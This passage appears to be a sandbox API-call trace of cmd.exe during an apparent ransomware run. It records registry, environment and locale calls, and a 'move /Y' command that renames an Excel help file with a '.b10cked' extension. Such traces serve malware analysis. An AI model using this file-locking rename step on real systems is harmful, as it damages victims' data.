lpSystemTimeAsFileTime=0x2efe84*(dwLowDateTime=0xaa7b3940, dwHighDateTime=0x1d440a9)) [0197.396] GetCurrentProcessId () returned 0xbb4 [0197.397] GetCurrentThreadId () returned 0xcbc [0197.397] GetTickCount () returned 0x37e81 [0197.397] QueryPerformanceCounter (in: lpPerformanceCount=0x2efe7c | out: lpPerformanceCount=0x2efe7c*=25418578511) returned 1 [0197.397] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0197.397] __set_app_type (_Type=0x1) [0197.397] __p__fmode () returned 0x76b331f4 [0197.397] __p__commode () returned 0x76b331fc [0197.397] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0197.397] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0197.398] GetCurrentThreadId () returned 0xcbc [0197.398] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcbc) returned 0x38 [0197.398] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0197.398] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0197.398] SetThreadUILanguage (LangId=0x0) returned 0x409 [0197.398] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0197.398] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efe14 | out: phkResult=0x2efe14*=0x0) returned 0x2 [0197.398] VirtualQuery (in: lpAddress=0x2efe4b, lpBuffer=0x2efde4, dwLength=0x1c | out: lpBuffer=0x2efde4*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0197.398] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efde4, dwLength=0x1c | out: lpBuffer=0x2efde4*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0197.398] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efde4, dwLength=0x1c | out: lpBuffer=0x2efde4*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0197.398] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efde4, dwLength=0x1c | out: lpBuffer=0x2efde4*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0197.398] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efde4, dwLength=0x1c | out: lpBuffer=0x2efde4*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0197.398] GetConsoleOutputCP () returned 0x1b5 [0197.398] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0197.398] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0197.398] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.398] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0197.399] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.399] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0197.399] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.399] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0197.399] _get_osfhandle (_FileHandle=0) returned 0x3 [0197.399] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0197.399] _get_osfhandle (_FileHandle=0) returned 0x3 [0197.399] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0197.399] GetEnvironmentStringsW () returned 0x4d0180* [0197.399] FreeEnvironmentStringsW (penv=0x4d0180) returned 1 [0197.400] GetEnvironmentStringsW () returned 0x4d0180* [0197.400] FreeEnvironmentStringsW (penv=0x4d0180) returned 1 [0197.400] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eed84 | out: phkResult=0x2eed84*=0x40) returned 0x0 [0197.400] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eed8c, lpData=0x2eed90, lpcbData=0x2eed88*=0x1000 | out: lpType=0x2eed8c*=0x0, lpData=0x2eed90*=0xa8, lpcbData=0x2eed88*=0x1000) returned 0x2 [0197.400] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eed8c, lpData=0x2eed90, lpcbData=0x2eed88*=0x1000 | out: lpType=0x2eed8c*=0x4, lpData=0x2eed90*=0x1, lpcbData=0x2eed88*=0x4) returned 0x0 [0197.400] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eed8c, lpData=0x2eed90, lpcbData=0x2eed88*=0x1000 | out: lpType=0x2eed8c*=0x0, lpData=0x2eed90*=0x1, lpcbData=0x2eed88*=0x1000) returned 0x2 [0197.400] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eed8c, lpData=0x2eed90, lpcbData=0x2eed88*=0x1000 | out: lpType=0x2eed8c*=0x4, lpData=0x2eed90*=0x0, lpcbData=0x2eed88*=0x4) returned 0x0 [0197.400] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eed8c, lpData=0x2eed90, lpcbData=0x2eed88*=0x1000 | out: lpType=0x2eed8c*=0x4, lpData=0x2eed90*=0x40, lpcbData=0x2eed88*=0x4) returned 0x0 [0197.400] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eed8c, lpData=0x2eed90, lpcbData=0x2eed88*=0x1000 | out: lpType=0x2eed8c*=0x4, lpData=0x2eed90*=0x40, lpcbData=0x2eed88*=0x4) returned 0x0 [0197.400] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eed8c, lpData=0x2eed90, lpcbData=0x2eed88*=0x1000 | out: lpType=0x2eed8c*=0x0, lpData=0x2eed90*=0x40, lpcbData=0x2eed88*=0x1000) returned 0x2 [0197.400] RegCloseKey (hKey=0x40) returned 0x0 [0197.400] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eed84 | out: phkResult=0x2eed84*=0x40) returned 0x0 [0197.400] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eed8c, lpData=0x2eed90, lpcbData=0x2eed88*=0x1000 | out: lpType=0x2eed8c*=0x0, lpData=0x2eed90*=0x40, lpcbData=0x2eed88*=0x1000) returned 0x2 [0197.400] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eed8c, lpData=0x2eed90, lpcbData=0x2eed88*=0x1000 | out: lpType=0x2eed8c*=0x4, lpData=0x2eed90*=0x1, lpcbData=0x2eed88*=0x4) returned 0x0 [0197.400] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eed8c, lpData=0x2eed90, lpcbData=0x2eed88*=0x1000 | out: lpType=0x2eed8c*=0x0, lpData=0x2eed90*=0x1, lpcbData=0x2eed88*=0x1000) returned 0x2 [0197.400] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eed8c, lpData=0x2eed90, lpcbData=0x2eed88*=0x1000 | out: lpType=0x2eed8c*=0x4, lpData=0x2eed90*=0x0, lpcbData=0x2eed88*=0x4) returned 0x0 [0197.400] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eed8c, lpData=0x2eed90, lpcbData=0x2eed88*=0x1000 | out: lpType=0x2eed8c*=0x4, lpData=0x2eed90*=0x9, lpcbData=0x2eed88*=0x4) returned 0x0 [0197.400] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eed8c, lpData=0x2eed90, lpcbData=0x2eed88*=0x1000 | out: lpType=0x2eed8c*=0x4, lpData=0x2eed90*=0x9, lpcbData=0x2eed88*=0x4) returned 0x0 [0197.400] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eed8c, lpData=0x2eed90, lpcbData=0x2eed88*=0x1000 | out: lpType=0x2eed8c*=0x0, lpData=0x2eed90*=0x9, lpcbData=0x2eed88*=0x1000) returned 0x2 [0197.400] RegCloseKey (hKey=0x40) returned 0x0 [0197.400] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639f [0197.400] srand (_Seed=0x5b88639f) [0197.400] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.14.1033.hxn.b10cked\"" [0197.401] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.14.1033.hxn.b10cked\"" [0197.401] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0197.401] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4d18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0197.401] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0197.401] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0197.401] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0197.401] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0197.401] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0197.401] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0197.401] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0197.401] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0197.401] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0197.401] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0197.401] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0197.401] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0197.402] GetEnvironmentStringsW () returned 0x4d22d0* [0197.402] FreeEnvironmentStringsW (penv=0x4d22d0) returned 1 [0197.402] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.402] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0197.402] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0197.402] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0197.402] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0197.402] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0197.402] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0197.402] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0197.402] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0197.402] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0197.402] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2efb50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0197.402] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2efb50, lpFilePart=0x2efb4c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2efb4c*="Desktop") returned 0x18 [0197.402] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0197.402] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef8cc | out: lpFindFileData=0x2ef8cc) returned 0x4d0010 [0197.403] FindClose (in: hFindFile=0x4d0010 | out: hFindFile=0x4d0010) returned 1 [0197.403] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef8cc | out: lpFindFileData=0x2ef8cc) returned 0x4d0010 [0197.403] FindClose (in: hFindFile=0x4d0010 | out: hFindFile=0x4d0010) returned 1 [0197.403] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef8cc | out: lpFindFileData=0x2ef8cc) returned 0x4d0010 [0197.403] FindClose (in: hFindFile=0x4d0010 | out: hFindFile=0x4d0010) returned 1 [0197.403] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0197.403] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0197.403] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0197.403] GetEnvironmentStringsW () returned 0x4d2af0* [0197.403] FreeEnvironmentStringsW (penv=0x4d2af0) returned 1 [0197.403] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0197.404] GetConsoleOutputCP () returned 0x1b5 [0197.404] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0197.404] GetUserDefaultLCID () returned 0x409 [0197.404] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0197.404] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efc90, cchData=128 | out: lpLCData="0") returned 2 [0197.404] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efc90, cchData=128 | out: lpLCData="0") returned 2 [0197.404] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2efc90, cchData=128 | out: lpLCData="1") returned 2 [0197.404] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0197.404] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0197.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0197.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0197.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0197.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0197.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0197.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0197.405] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0197.405] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0197.405] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0197.406] GetConsoleTitleW (in: lpConsoleTitle=0x4c08e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.406] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0197.406] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0197.406] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0197.406] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0197.406] _wcsicmp (_String1="move", _String2=")") returned 68 [0197.406] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0197.406] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0197.407] _wcsicmp (_String1="IF", _String2="move") returned -4 [0197.407] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0197.407] _wcsicmp (_String1="REM", _String2="move") returned 5 [0197.407] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0197.409] GetConsoleTitleW (in: lpConsoleTitle=0x2ef988, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.409] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0197.409] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0197.409] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0197.409] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0197.409] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0197.409] _wcsicmp (_String1="move", _String2="CD") returned 10 [0197.410] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0197.410] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0197.410] _wcsicmp (_String1="move", _String2="REN") returned -5 [0197.410] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0197.410] _wcsicmp (_String1="move", _String2="SET") returned -6 [0197.410] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0197.410] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0197.410] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0197.410] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0197.410] _wcsicmp (_String1="move", _String2="MD") returned 11 [0197.410] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0197.410] _wcsicmp (_String1="move", _String2="RD") returned -5 [0197.410] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0197.410] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0197.410] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0197.410] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0197.410] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0197.410] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0197.410] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0197.410] _wcsicmp (_String1="move", _String2="VER") returned -9 [0197.410] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0197.410] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0197.410] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0197.410] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0197.410] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0197.410] _wcsicmp (_String1="move", _String2="START") returned -6 [0197.410] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0197.410] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0197.410] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0197.412] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.412] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.412] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ef744, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ef73c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef73c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0197.412] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0197.412] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0197.412] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0197.412] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0197.412] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0197.412] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0197.413] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0197.413] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0197.414] _wcsicmp (_String1="MSEXCE~1.HXN", _String2=".") returned 63 [0197.414] _wcsicmp (_String1="MSEXCE~1.HXN", _String2="..") returned 63 [0197.414] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msexce~1.hxn")) returned 0x2022 [0197.630] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4d1e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0197.630] SetErrorMode (uMode=0x0) returned 0x0 [0197.630] SetErrorMode (uMode=0x1) returned 0x0 [0197.630] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN", nBufferLength=0x104, lpBuffer=0x2ef0cc, lpFilePart=0x2ef0b4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN", lpFilePart=0x2ef0b4*="MSEXCE~1.HXN") returned 0x27 [0197.630] SetErrorMode (uMode=0x0) returned 0x1 [0197.630] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0197.630] _wcsicmp (_String1="MSEXCE~1.HXN", _String2=".") returned 63 [0197.630] _wcsicmp (_String1="MSEXCE~1.HXN", _String2="..") returned 63 [0197.630] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msexce~1.hxn")) returned 0x2022 [0197.631] SetErrorMode (uMode=0x0) returned 0x0 [0197.631] SetErrorMode (uMode=0x1) returned 0x0 [0197.631] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN", nBufferLength=0x104, lpBuffer=0x2ef548, lpFilePart=0x2ef2e0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN", lpFilePart=0x2ef2e0*="MSEXCE~1.HXN") returned 0x27 [0197.631] SetErrorMode (uMode=0x0) returned 0x1 [0197.631] SetErrorMode (uMode=0x0) returned 0x0 [0197.631] SetErrorMode (uMode=0x1) returned 0x0 [0197.631] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x2ef750, lpFilePart=0x2ef2e0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.14.1033.hxn.b10cked", lpFilePart=0x2ef2e0*="MS.EXCEL.14.1033.hxn.b10cked") returned 0x37 [0197.631] SetErrorMode (uMode=0x0) returned 0x1 [0197.631] SetLastError (dwErrCode=0x0) [0197.631] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.excel.14.1033.hxn.b10cked")) returned 0xffffffff [0197.631] GetLastError () returned 0x2 [0197.631] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x2eec5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eec5c) returned 0x4c0e68 [0197.631] FindNextFileW (in: hFindFile=0x4c0e68, lpFindFileData=0x2eec5c | out: lpFindFileData=0x2eec5c) returned 0 [0197.632] FindClose (in: hFindFile=0x4c0e68 | out: hFindFile=0x4c0e68) returned 1 [0197.632] GetLastError () returned 0x12 [0197.632] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x2eec5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eec5c) returned 0x4c0e68 [0197.632] FindNextFileW (in: hFindFile=0x4c0e68, lpFindFileData=0x2eec5c | out: lpFindFileData=0x2eec5c) returned 0 [0197.632] FindClose (in: hFindFile=0x4c0e68 | out: hFindFile=0x4c0e68) returned 1 [0197.632] GetLastError () returned 0x12 [0197.633] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x4d1bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4d1bd8) returned 0x4c0e68 [0197.633] 